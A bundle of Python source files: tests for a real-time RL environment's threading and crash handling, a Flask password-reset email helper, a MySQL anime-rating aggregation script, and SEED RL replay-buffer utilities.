def _compute_actuation_(self, action, timestamp, index):
if self.crash_flag.value == 2:
raise Exception("Compute actuation crash triggered.")
self._actuation_packet_['generic1'] = action
self._actuation_packet_['generic2'] = action
values = self._rand_obj_.uniform(-1, +1, 3)
rand_state_array_type, rand_state_array_size, rand_state_array = utils.get_random_state_array(
self._rand_obj_.get_state()
)
np.copyto(self._shared_rstate_array_, np.frombuffer(rand_state_array, dtype=rand_state_array_type))
np.copyto(self._uniform_array_, values)
def _reset_(self):
self.reset_call_flag.value = 1
class TestRTRLBaseEnv(unittest.TestCase):
def setUp(self):
return
def tearDown(self):
return
def testInit(self):
env = RTRLBaseEnv({}, 2, 3)
self.assertFalse(env._running)
self.assertEqual(env._action_buffer.array_len, 2)
self.assertEqual(env._sensation_buffer.array_len, 5)
def testInitWithCommunicator(self):
env = RTRLBaseEnv({'generic': {'Communicator': MockCommunicator, 'kwargs': {}}}, 2, 3)
self.assertFalse(env._running)
self.assertEqual(len(env._all_comms), 1)
self.assertEqual(env._action_buffer.array_len, 2)
self.assertEqual(env._sensation_buffer.array_len, 5)
def testStartSinglethread(self):
env = RTRLBaseEnv({}, 2, 3, run_mode='singlethread')
env.start()
self.assertTrue(env._running)
env.close()
self.assertFalse(env._running)
def testStartMultithread(self):
env = RTRLBaseEnv({}, 2, 3, run_mode='multithread')
env.start()
self.assertTrue(env._running)
time.sleep(0.5)
self.assertTrue(env._polling_loop.is_alive())
env.close()
self.assertFalse(env._running)
self.assertFalse(env._polling_loop.is_alive())
def testStartMultiprocess(self):
env = RTRLBaseEnv({}, 2, 3, run_mode='multiprocess')
env.start()
self.assertTrue(env._running)
time.sleep(0.5)
self.assertTrue(env._polling_loop.is_alive())
env.close()
self.assertFalse(env._running)
self.assertFalse(env._polling_loop.is_alive())
def testNotImplementedError(self):
env = RTRLBaseEnv({}, 2, 3, run_mode='singlethread')
env.start()
with self.assertRaises(NotImplementedError):
env.step(0)
env.close()
def testStartWithCommunicator(self):
env = RTRLBaseEnv({'generic': {'Communicator': MockCommunicator, 'kwargs': {}}}, 2, 3, run_mode='singlethread')
env.start()
time.sleep(0.5)
self.assertTrue(env._running)
self.assertTrue(env._all_comms['generic'].is_alive())
env.close()
self.assertFalse(env._running)
self.assertFalse(env._all_comms['generic'].is_alive())
def testStepWithSinglethread(self):
env = MockEnv(1, 1, run_mode='singlethread')
env.start()
time.sleep(0.5)
obs, reward, done, info = env.step(0)
self.assertEqual(obs, [3])
self.assertEqual(reward, 2)
self.assertEqual(done, 1)
env.close()
def testStepWithMultithread(self):
env = MockEnv(1, 1, run_mode='multithread')
env.start()
time.sleep(0.5)
obs, reward, done, info = env.step(0)
self.assertEqual(obs, [3])
self.assertEqual(reward, 2)
self.assertEqual(done, 1)
env.close()
def testStepWithMultiprocess(self):
env = MockEnv(1, 1, run_mode='multiprocess')
env.start()
time.sleep(0.5)
obs, reward, done, info = env.step(0)
self.assertEqual(obs, [3])
self.assertEqual(reward, 2)
self.assertEqual(done, 1)
env.close()
def testResetSinglethread(self):
env = MockEnv(1, 1, run_mode='singlethread')
env.start()
time.sleep(0.5)
obs = env.reset()
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testResetMultithreadBlocking(self):
env = MockEnv(1, 1, run_mode='multithread')
env.start()
time.sleep(0.5)
obs = env.reset()
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testResetMultithreadNonblocking(self):
env = MockEnv(1, 1, run_mode='multithread')
env.start()
time.sleep(0.5)
obs = env.reset(blocking=False)
time.sleep(0.5)
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testResetMultiprocessBlocking(self):
env = MockEnv(1, 1, run_mode='multiprocess')
env.start()
time.sleep(0.5)
obs = env.reset()
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testResetMultiprocessNonblocking(self):
env = MockEnv(1, 1, run_mode='multiprocess')
env.start()
time.sleep(0.5)
obs = env.reset(blocking=False)
time.sleep(0.5)
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testSinglethreadCommNotAlive(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='singlethread')
self._env.start()
self._env.step(0)
# set the communicator flag to 1, wait a few time steps and check that step will crash
self._env._all_comms['generic1'].crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators have been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
self._env.close()
def testMultithreadCommNotAlive(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='multithread')
self._env.start()
self._env.step(0)
# set the communicator flag to 1, wait a few time steps and check that step will crash
self._env._all_comms['generic1'].crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators have been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
# check the polling thread has been closed
self.assertFalse(self._env._polling_loop.is_alive())
self._env.close()
def testMultiprocessCommNotAlive(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
self._env.start()
self._env.step(0)
# set the communicator flag to 1, wait a few time steps and check that step will crash
self._env._all_comms['generic1'].crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators have been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
# check the polling thread has been closed
self.assertFalse(self._env._polling_loop.is_alive())
self._env.close()
def testMultithreadPollingDead(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='multithread')
self._env.start()
self._env.step(0)
self._env.crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators have been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
# check the polling thread has been closed
self.assertFalse(self._env._polling_loop.is_alive())
self._env.close()
def testMultiprocessPollingDead(self):
self._env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
self._env.start()
self._env.step(0)
self._env.crash_flag.value = 1
time.sleep(1.5)
with self.assertRaises(Exception):
self._env.step(0)
# give some time for process to completely close
time.sleep(1.5)
# check all communicators have been closed
for comm in self._env._all_comms.values():
self.assertFalse(comm.is_alive())
# check the polling thread has been closed
self.assertFalse(self._env._polling_loop.is_alive())
self._env.close()
def testSinglethreadMainProcessDead(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='singlethread')
env.start()
while True:
env.step(0)
curr_process_util = psutil.Process()
main_process = Process(target=spawn_main_process)
main_process.start()
# give some time to make sure everything is running
time.sleep(1.0)
child_processes = curr_process_util.children(recursive=True)
self.assertEqual(len(child_processes), 3)
main_process.terminate()
main_process.join()
time.sleep(2.0)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testMultithreadMainProcessDead(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multithread')
env.start()
while True:
env.step(0)
curr_process_util = psutil.Process()
main_process = Process(target=spawn_main_process)
main_process.start()
# give some time to make sure everything is running
time.sleep(1.0)
child_processes = curr_process_util.children(recursive=True)
self.assertEqual(len(child_processes), 3)
main_process.terminate()
main_process.join()
time.sleep(2.0)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testMultiprocessMainProcessDead(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
env.start()
while True:
env.step(0)
curr_process_util = psutil.Process()
main_process = Process(target=spawn_main_process)
main_process.start()
# give some time to make sure everything is running
time.sleep(1.0)
child_processes = curr_process_util.children(recursive=True)
self.assertEqual(len(child_processes), 4)
main_process.terminate()
main_process.join()
time.sleep(2.0)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testSinglethreadMainProcessException(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='singlethread')
env.start()
env.crash_flag.value = 3
env.step(0)
main_process = Process(target=spawn_main_process)
main_process.start()
time.sleep(1.0)
main_process.join()
curr_process_util = psutil.Process()
child_processes = curr_process_util.children(recursive=True)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testMultithreadMainProcessException(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multithread')
env.start()
env.crash_flag.value = 3
env.step(0)
main_process = Process(target=spawn_main_process)
main_process.start()
time.sleep(1.0)
main_process.join()
curr_process_util = psutil.Process()
child_processes = curr_process_util.children(recursive=True)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testMultiprocessMainProcessException(self):
def spawn_main_process():
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
env.start()
env.crash_flag.value = 3
env.step(0)
main_process = Process(target=spawn_main_process)
main_process.start()
time.sleep(1.0)
main_process.join()
curr_process_util = psutil.Process()
child_processes = curr_process_util.children(recursive=True)
self.assertFalse(any([c.is_running() for c in child_processes]))
def testSharedRandomState(self):
env = MockEnv(action_dim=1, observation_dim=1, run_mode='multiprocess')
initial_rand_obj = copy.deepcopy(env._rand_obj_)
initial_values = initial_rand_obj.uniform(-1, +1, 3)
env.start()
for _ in range(3):
env.step(0)
updated_rand_obj = np.random.RandomState()
updated_rand_obj.set_state(utils.get_random_state_from_array(env._shared_rstate_array_))
safe_final_values = updated_rand_obj.uniform(-1, +1, 3)
unsafe_final_values = env._rand_obj_.uniform(-1, +1, 3)
env.step(0)
env.close()
assert np.all(initial_values == unsafe_final_values)
assert np.all(initial_values != safe_final_values)
assert np.all(safe_final_values == env._uniform_array_)
if __name__ == '__main__':
unittest.main(buffer=True)
|
email.py
|
from threading import Thread
from flask import render_template
from flask_mail import Message
from app import app, mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Social Insecurity] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
def send_enable_account_email(user):
token = user.get_account_enable_token()
send_email('[Social Insecurity] Enable your account',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/enable_account.txt',
user=user, token=token),
html_body=render_template('email/enable_account.html',
user=user, token=token))
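# Illustrative usage sketch (not part of the original module): any other
# notification can reuse send_email() the same way as the two helpers above.
# The function name and message text below are hypothetical; `user` is assumed
# to be a User model exposing an `email` attribute.
def send_test_email(user):
    send_email('[Social Insecurity] Test message',
               sender=app.config['ADMINS'][0],
               recipients=[user.email],
               text_body='This is a test message.',
               html_body='<p>This is a test message.</p>')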
|
insert_rating.py
|
import time
import pymysql
import mysql.connector
import multiprocessing
from pymysql.cursors import DictCursor
from multiprocessing import Process, Pool
db1 = pymysql.connect(host="localhost", user="root", password="", database="miraihyoka")
db2 = pymysql.connect(host="localhost", user="root", password="", database="miraihyoka")
cursor_b = db1.cursor(DictCursor)
cursor_m = db2.cursor(DictCursor)
# Seven rating sources:
# mal_rating anidb_rating ann_rating anikore_rating bangumi_rating imdb_rating douban_rating
def get_rating():
i = 1
sql2 = "select * from animate "
# args = (rating, rating)
cursor_b.execute(sql2)
items_b = cursor_b.fetchall()
for item_b in items_b:
animate_id = item_b['animate_id']
# Weight assigned to each site
mal_p = 50
anidb_p = 30
ann_p = 30
anikore_p = 100
bangumi_p = 60
douban_p = 40
imdb_p = 30
mal_rating = item_b['mal_rating']
anidb_rating = item_b['anidb_rating']
ann_rating = item_b['ann_rating']
anikore_rating = item_b['anikore_rating']
bangumi_rating = item_b['bangumi_rating']
imdb_rating = item_b['imdb_rating']
douban_rating = item_b['douban_rating']
anikore_rating /= 10
if mal_rating == 0:
mal_p = 0
if anidb_rating == 0 or anidb_rating is None:
anidb_p = 0
if anidb_rating is None:
anidb_rating=0
if ann_rating == 0:
ann_p = 0
if anikore_rating == 0:
anikore_p = 0
if bangumi_rating == 0:
bangumi_p = 0
if imdb_rating == 0:
imdb_p = 0
if douban_rating == 0:
douban_p = 0
rating = (
mal_rating * mal_p + anidb_rating * anidb_p + ann_rating * ann_p + anikore_rating * anikore_p + bangumi_rating * bangumi_p + imdb_rating * imdb_p + douban_rating * douban_p) / (
mal_p + anidb_p + ann_p + anikore_p + bangumi_p + douban_p + imdb_p)
sql1 = "update animate set media_rating=%s where animate_id=%s"
cursor_m.execute(sql1, (rating, animate_id))
db2.commit()
print("----------------- inserted " + str(i) + " rows -----------------")
i += 1
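# Illustrative helper (not used by get_rating above): the same weighted average
# written as a standalone function, with missing ratings (0 or None) dropped
# explicitly instead of zeroing their weights.
def weighted_mean(ratings, weights):
    pairs = [(r, w) for r, w in zip(ratings, weights) if r]
    total_weight = sum(w for _, w in pairs)
    if total_weight == 0:
        return 0
    return sum(r * w for r, w in pairs) / total_weight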
if __name__ == '__main__':
get_rating()
# sql1 = "select * from animate"
# db2.ping(reconnect=True)
# cursor_m.execute(sql1)
# items_m = cursor_m.fetchall()
# nnn = 0
# aa = Pool(30)
# for item_m in items_m:
# an = item_m["animate_id"]
# bid = item_m["bangumi_idid"]
# if bid is not None:
# nnn += 1
# aa.apply_async(get_rank, args=(an, bid, nnn))
# # p = Process(target=getbangumiid, args=(an, bid, nnn))
# # p.start()
# aa.close()
# aa.join()
|
utils.py
|
# coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions/classes."""
import collections
import threading
import timeit
from absl import logging
import gym
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
from tensorflow.python.distribute import values as values_lib
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import tensor_conversion_registry
# `observation` is the observation *after* a transition. When `done` is True,
# `observation` will be the observation *after* the reset.
EnvOutput = collections.namedtuple(
'EnvOutput', 'reward done observation abandoned episode_step')
Settings = collections.namedtuple(
'Settings', 'strategy inference_devices training_strategy encode decode')
def init_learner(num_training_tpus):
"""Performs common learner initialization."""
if tf.config.experimental.list_logical_devices('TPU'):
resolver = tf.distribute.cluster_resolver.TPUClusterResolver('')
topology = tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.experimental.TPUStrategy(resolver)
training_da = tf.tpu.experimental.DeviceAssignment.build(
topology, num_replicas=num_training_tpus)
training_strategy = tf.distribute.experimental.TPUStrategy(
resolver, device_assignment=training_da)
inference_devices = list(set(strategy.extended.worker_devices) -
set(training_strategy.extended.worker_devices))
return Settings(strategy, inference_devices, training_strategy, tpu_encode,
tpu_decode)
else:
tf.device('/cpu').__enter__()
any_gpu = tf.config.experimental.list_logical_devices('GPU')
device_name = '/device:GPU:0' if any_gpu else '/device:CPU:0'
strategy = tf.distribute.OneDeviceStrategy(device=device_name)
enc = lambda x: x
dec = lambda x, s=None: x if s is None else tf.nest.pack_sequence_as(s, x)
return Settings(strategy, [device_name], strategy, enc, dec)
class UnrollStore(tf.Module):
"""Utility module for combining individual actor steps into unrolls."""
def __init__(self,
num_actors,
unroll_length,
timestep_specs,
num_overlapping_steps=0,
name='UnrollStore'):
super(UnrollStore, self).__init__(name=name)
with self.name_scope:
self._full_length = num_overlapping_steps + unroll_length + 1
def create_unroll_variable(spec):
z = tf.zeros(
[num_actors, self._full_length] + spec.shape.dims, dtype=spec.dtype)
return tf.Variable(z, trainable=False, name=spec.name)
self._unroll_length = unroll_length
self._num_overlapping_steps = num_overlapping_steps
self._state = tf.nest.map_structure(create_unroll_variable,
timestep_specs)
# For each actor, the index into the actor dimension of the tensors in
# self._state where we should add the next element.
self._index = tf.Variable(
tf.fill([num_actors], tf.constant(num_overlapping_steps, tf.int32)),
trainable=False,
name='index')
@property
def unroll_specs(self):
return tf.nest.map_structure(lambda v: tf.TensorSpec(v.shape[1:], v.dtype),
self._state)
@tf.function
@tf.Module.with_name_scope
def append(self, actor_ids, values):
"""Appends values and returns completed unrolls.
Args:
actor_ids: 1D tensor with the list of actor IDs for which we append data.
There must not be duplicates.
values: Values to add for each actor. This is a structure (in the tf.nest
sense) of tensors following "timestep_specs", with a batch front
dimension which must be equal to the length of 'actor_ids'.
Returns:
A pair of:
- 1D tensor of the actor IDs of the completed unrolls.
- Completed unrolls. This is a structure of tensors following
'timestep_specs', with added front dimensions: [num_completed_unrolls,
num_overlapping_steps + unroll_length + 1].
"""
tf.debugging.assert_equal(
tf.shape(actor_ids),
tf.shape(tf.unique(actor_ids)[0]),
message='Duplicate actor ids')
tf.nest.map_structure(
lambda s: tf.debugging.assert_equal(
tf.shape(actor_ids)[0],
tf.shape(s)[0],
message='Batch dimension must be same size as number of actors.'),
values)
curr_indices = self._index.sparse_read(actor_ids)
unroll_indices = tf.stack([actor_ids, curr_indices], axis=-1)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_nd_update(unroll_indices, v)
# Intentionally not protecting against out-of-bounds to make it possible to
# detect completed unrolls.
self._index.scatter_add(tf.IndexedSlices(1, actor_ids))
return self._complete_unrolls(actor_ids)
@tf.function
@tf.Module.with_name_scope
def reset(self, actor_ids):
"""Resets state.
Note, this is only intended to be called when actors need to be reset after
preemptions. Not at episode boundaries.
Args:
actor_ids: The actors that need to have their state reset.
"""
self._index.scatter_update(
tf.IndexedSlices(self._num_overlapping_steps, actor_ids))
# The following code is the equivalent of:
# s[actor_ids, :j] = 0
j = self._num_overlapping_steps
repeated_actor_ids = tf.reshape(
tf.tile(tf.expand_dims(tf.cast(actor_ids, tf.int64), -1), [1, j]), [-1])
repeated_range = tf.tile(tf.range(j, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
indices = tf.stack([repeated_actor_ids, repeated_range], axis=-1)
for s in tf.nest.flatten(self._state):
z = tf.zeros(tf.concat([tf.shape(repeated_actor_ids),
s.shape[2:]], axis=0), s.dtype)
s.scatter_nd_update(indices, z)
def _complete_unrolls(self, actor_ids):
# Actors whose unrolls are now complete and should be returned.
actor_indices = self._index.sparse_read(actor_ids)
actor_ids = tf.gather(
actor_ids,
tf.where(tf.equal(actor_indices, self._full_length))[:, 0])
actor_ids = tf.cast(actor_ids, tf.int64)
unrolls = tf.nest.map_structure(lambda s: s.sparse_read(actor_ids),
self._state)
# Store last transitions as the first in the next unroll.
# The following code is the equivalent of:
# s[actor_ids, :j] = s[actor_ids, -j:]
j = self._num_overlapping_steps + 1
repeated_start_range = tf.tile(tf.range(j, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
repeated_end_range = tf.tile(
tf.range(self._full_length - j, self._full_length, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
repeated_actor_ids = tf.reshape(
tf.tile(tf.expand_dims(actor_ids, -1), [1, j]), [-1])
start_indices = tf.stack([repeated_actor_ids, repeated_start_range], -1)
end_indices = tf.stack([repeated_actor_ids, repeated_end_range], -1)
for s in tf.nest.flatten(self._state):
s.scatter_nd_update(start_indices, s.gather_nd(end_indices))
self._index.scatter_update(
tf.IndexedSlices(1 + self._num_overlapping_steps, actor_ids))
return actor_ids, unrolls
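# Illustrative usage sketch (not part of the original module); assumes eager
# TF2 and a single scalar observation spec. After unroll_length + 1 appends,
# append() returns the completed actor ids and their [2, 4] unrolls.
def _example_unroll_store():
  store = UnrollStore(num_actors=2, unroll_length=3,
                      timestep_specs=tf.TensorSpec([], tf.float32, 'obs'))
  for step in range(4):
    ids, unrolls = store.append(tf.constant([0, 1]),
                                tf.constant([float(step)] * 2))
  return ids, unrolls  # ids == [0, 1], unrolls.shape == [2, 4]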
class PrioritizedReplay(tf.Module):
"""Prioritized Replay Buffer.
This buffer is not threadsafe. Make sure you call insert() and sample() from a
single thread.
"""
def __init__(self, size, specs, importance_sampling_exponent,
name='PrioritizedReplay'):
super(PrioritizedReplay, self).__init__(name=name)
self._priorities = tf.Variable(tf.zeros([size]), dtype=tf.float32)
self._buffer = tf.nest.map_structure(
lambda ts: tf.Variable(tf.zeros([size] + ts.shape, dtype=ts.dtype)),
specs)
self.num_inserted = tf.Variable(0, dtype=tf.int64)
self._importance_sampling_exponent = importance_sampling_exponent
@tf.function
@tf.Module.with_name_scope
def insert(self, values, priorities):
"""FIFO insertion/removal.
Args:
values: The batched values to insert. The tensors must be of the same
shape and dtype as the `specs` provided in the constructor, except
including a batch dimension.
priorities: <float32>[batch_size] tensor with the priorities of the
elements we insert.
Returns:
The indices of the inserted values.
"""
tf.nest.assert_same_structure(values, self._buffer)
values = tf.nest.map_structure(tf.convert_to_tensor, values)
append_size = tf.nest.flatten(values)[0].shape[0]
start_index = self.num_inserted
end_index = start_index + append_size
# Wrap around insertion.
size = self._priorities.shape[0]
insert_indices = tf.range(start_index, end_index) % size
tf.nest.map_structure(
lambda b, v: b.batch_scatter_update(
tf.IndexedSlices(v, insert_indices)),
self._buffer,
values)
self.num_inserted.assign_add(append_size)
self._priorities.batch_scatter_update(
tf.IndexedSlices(priorities, insert_indices))
return insert_indices
@tf.function
@tf.Module.with_name_scope
def sample(self, num_samples, priority_exp):
r"""Samples items from the replay buffer, using priorities.
Args:
num_samples: int, number of replay items to sample.
priority_exp: Priority exponent. Every item i in the replay buffer will be
sampled with probability:
priority[i] ** priority_exp /
sum(priority[j] ** priority_exp, j \in [0, num_items))
Set this to 0 in order to get uniform sampling.
Returns:
Tuple of:
- indices: An int64 tensor of shape [num_samples] with the indices in
the replay buffer of the sampled items.
- weights: A float32 tensor of shape [num_samples] with the normalized
weights of the sampled items.
- sampled_values: A nested structure following the spec passed in the
constructor, where each tensor has an added front batch dimension equal
to 'num_samples'.
"""
tf.debugging.assert_greater(
self.num_inserted,
tf.constant(0, tf.int64),
message='Cannot sample if replay buffer is empty')
size = self._priorities.shape[0]
limit = tf.minimum(tf.cast(size, tf.int64), self.num_inserted)
if priority_exp == 0:
indices = tf.random.uniform([num_samples], maxval=limit, dtype=tf.int64)
weights = tf.ones_like(indices, dtype=tf.float32)
else:
prob = self._priorities[:limit]**priority_exp
prob /= tf.reduce_sum(prob)
indices = tf.random.categorical([tf.math.log(prob)], num_samples)[0]
# Importance weights.
weights = (((1. / tf.cast(limit, tf.float32)) /
tf.gather(prob, indices)) **
self._importance_sampling_exponent)
weights /= tf.reduce_max(weights) # Normalize.
sampled_values = tf.nest.map_structure(
lambda b: b.sparse_read(indices), self._buffer)
return indices, weights, sampled_values
@tf.function
@tf.Module.with_name_scope
def update_priorities(self, indices, priorities):
"""Updates the priorities of the items with the given indices.
Args:
indices: <int64>[batch_size] tensor with the indices of the items to
update. If duplicate indices are provided, the priority that will be set
among possible ones is not specified.
priorities: <float32>[batch_size] tensor with the new priorities.
"""
self._priorities.batch_scatter_update(tf.IndexedSlices(priorities, indices))
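# Illustrative usage sketch (not part of the original module); assumes eager
# TF2 and scalar transitions. Shows one insert/sample/update_priorities cycle.
def _example_prioritized_replay():
  replay = PrioritizedReplay(size=8,
                             specs=tf.TensorSpec([], tf.float32, 'obs'),
                             importance_sampling_exponent=0.6)
  replay.insert(tf.constant([1.0, 2.0, 3.0]), tf.constant([0.5, 1.0, 2.0]))
  indices, weights, values = replay.sample(num_samples=2, priority_exp=1.0)
  replay.update_priorities(indices, tf.ones_like(weights))
  return indices, weights, values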
class HindsightExperienceReplay(PrioritizedReplay):
"""Replay Buffer with Hindsight Experience Replay.
Hindsight goals are sampled uniformly from subsequent steps in the
same window (`future` strategy from https://arxiv.org/pdf/1707.01495).
They are not guaranteed to come from the same episode.
This buffer is not threadsafe. Make sure you call insert() and sample() from a
single thread.
"""
def __init__(self, size, specs, importance_sampling_exponent,
compute_reward_fn,
unroll_length,
substitution_probability,
name='HindsightExperienceReplay'):
super(HindsightExperienceReplay, self).__init__(
size, specs, importance_sampling_exponent, name)
self._compute_reward_fn = compute_reward_fn
self._unroll_length = unroll_length
self._substitution_probability = substitution_probability
@tf.Module.with_name_scope
def sample(self, num_samples, priority_exp):
indices, weights, sampled_values = super(
HindsightExperienceReplay, self).sample(num_samples, priority_exp)
observation = sampled_values.env_outputs.observation
batch_size, time_horizon = observation['achieved_goal'].shape[:2]
def compute_goal_reward():
# reward[batch][time] is the reward on transition from timestep time-1
# to time. This function outputs incorrect rewards for the last transition
# in each episode but we filter such cases later.
goal_reward = self._compute_reward_fn(
achieved_goal=observation['achieved_goal'][:, 1:],
desired_goal=observation['desired_goal'][:, :-1])
return tf.concat(values=[goal_reward[:, :1] * np.nan, goal_reward],
axis=1)
# Substitute goals.
old_goal_reward = compute_goal_reward()
assert old_goal_reward.shape == observation['achieved_goal'].shape[:-1]
goal_ind = tf.concat(
values=[tf.random.uniform((batch_size, 1), min(t + 1, time_horizon - 1),
time_horizon, dtype=tf.int32)
for t in range(time_horizon)], axis=1)
substituted_goal = tf.gather(observation['achieved_goal'],
goal_ind, axis=1, batch_dims=1)
mask = tf.cast(tfp.distributions.Bernoulli(
probs=self._substitution_probability *
tf.ones(goal_ind.shape)).sample(), observation['desired_goal'].dtype)
# We don't substitute goals for the last state in each episode because we
# don't store the next states for them.
mask *= tf.cast(~sampled_values.env_outputs.done,
observation['desired_goal'].dtype)
mask = mask[..., tf.newaxis]
observation['desired_goal'] = (
mask * substituted_goal + (1 - mask) * observation['desired_goal'])
# Substitute rewards
new_goal_reward = compute_goal_reward()
assert new_goal_reward.shape == observation['achieved_goal'].shape[:-1]
sampled_values = sampled_values._replace(
env_outputs=sampled_values.env_outputs._replace(
reward=sampled_values.env_outputs.reward +
(new_goal_reward - old_goal_reward) * tf.cast(
~sampled_values.env_outputs.done, tf.float32)
))
# Subsample unrolls of length unroll_length + 1.
assert time_horizon >= self._unroll_length + 1
unroll_begin_ind = tf.random.uniform(
(batch_size,), 0, time_horizon - self._unroll_length, dtype=tf.int32)
unroll_inds = unroll_begin_ind[:, tf.newaxis] + tf.math.cumsum(
tf.ones((batch_size, self._unroll_length + 1), tf.int32),
axis=1, exclusive=True)
subsampled_values = tf.nest.map_structure(
lambda t: tf.gather(t, unroll_inds, axis=1, batch_dims=1),
sampled_values)
if hasattr(sampled_values, 'agent_state'): # do not subsample the state
subsampled_values = subsampled_values._replace(
agent_state=sampled_values.agent_state)
return indices, weights, subsampled_values
class Aggregator(tf.Module):
"""Utility module for keeping state and statistics for individual actors."""
def __init__(self, num_actors, specs, name='Aggregator'):
"""Inits an Aggregator.
Args:
num_actors: int, number of actors.
specs: Structure (as defined by tf.nest) of tf.TensorSpecs that will be
stored for each actor.
name: Name of the scope for the operations.
"""
super(Aggregator, self).__init__(name=name)
def create_variable(spec):
z = tf.zeros([num_actors] + spec.shape.dims, dtype=spec.dtype)
return tf.Variable(z, trainable=False, name=spec.name)
self._state = tf.nest.map_structure(create_variable, specs)
@tf.Module.with_name_scope
def reset(self, actor_ids):
"""Fills the tensors for the given actors with zeros."""
with tf.name_scope('Aggregator_reset'):
for s in tf.nest.flatten(self._state):
s.scatter_update(tf.IndexedSlices(0, actor_ids))
@tf.Module.with_name_scope
def add(self, actor_ids, values):
"""In-place adds values to the state associated to the given actors.
Args:
actor_ids: 1D tensor with the list of actor IDs we want to add values to.
values: A structure of tensors following the input spec, with an added
first dimension that must either have the same size as 'actor_ids', or
should not exist (in which case, the value is broadcasted to all actor
ids).
"""
tf.nest.assert_same_structure(values, self._state)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_add(tf.IndexedSlices(v, actor_ids))
@tf.Module.with_name_scope
def read(self, actor_ids):
"""Reads the values corresponding to a list of actors.
Args:
actor_ids: 1D tensor with the list of actor IDs we want to read.
Returns:
A structure of tensors with the same shapes as the input specs. A
dimension is added in front of each tensor, with size equal to the number
of actor_ids provided.
"""
return tf.nest.map_structure(lambda s: s.sparse_read(actor_ids),
self._state)
@tf.Module.with_name_scope
def replace(self, actor_ids, values):
"""Replaces the state associated to the given actors.
Args:
actor_ids: 1D tensor with the list of actor IDs.
values: A structure of tensors following the input spec, with an added
first dimension that must either have the same size as 'actor_ids', or
should not exist (in which case, the value is broadcasted to all actor
ids).
"""
tf.nest.assert_same_structure(values, self._state)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_update(tf.IndexedSlices(v, actor_ids))
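# Illustrative usage sketch (not part of the original module); assumes eager
# TF2. Keeps one running scalar per actor; reset() zeroes the chosen actors.
def _example_aggregator():
  agg = Aggregator(num_actors=4, specs=tf.TensorSpec([], tf.float32, 'reward'))
  agg.add(tf.constant([0, 2]), tf.constant([1.5, 3.0]))
  agg.reset(tf.constant([2]))
  return agg.read(tf.constant([0, 1, 2]))  # [1.5, 0.0, 0.0]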
class ProgressLogger(object):
"""Helper class for performing periodic logging of the training progress."""
def __init__(self,
summary_writer=None,
initial_period=0.01,
period_factor=1.01,
max_period=10.0):
"""Constructs ProgressLogger.
Args:
summary_writer: Tensorflow summary writer to use.
initial_period: Initial logging period in seconds
(how often logging happens).
period_factor: Factor by which logging period is
multiplied after each iteration (exponential back-off).
max_period: Maximal logging period in seconds
(the end of exponential back-off).
"""
self.summary_writer = summary_writer
self.period = initial_period
self.period_factor = period_factor
self.max_period = max_period
# Array of strings with names of values to be logged.
self.log_keys = []
self.log_keys_set = set()
